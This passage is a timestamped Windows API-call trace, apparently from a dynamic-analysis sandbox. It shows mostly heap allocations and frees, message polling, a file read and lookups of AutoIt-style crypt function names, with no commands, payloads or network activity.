lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.029] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.029] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0078.029] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0078.029] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0078.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0078.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0078.035] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0078.035] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0xeafd, lpOverlapped=0x0) returned 1 [0078.038] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0078.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xeafd) returned 0x48f0048 [0078.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0078.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xeafd) returned 0x48feb50 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.045] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xeafd) returned 0x48f0048 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.045] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0078.046] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.046] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0078.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xeafd) returned 0x48f0048 [0078.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0078.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0078.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xeafd) returned 0x490d658 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.049] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0078.049] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.049] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.049] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0078.050] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0078.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0078.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.051] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.051] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0078.052] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.052] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0078.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0078.056] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 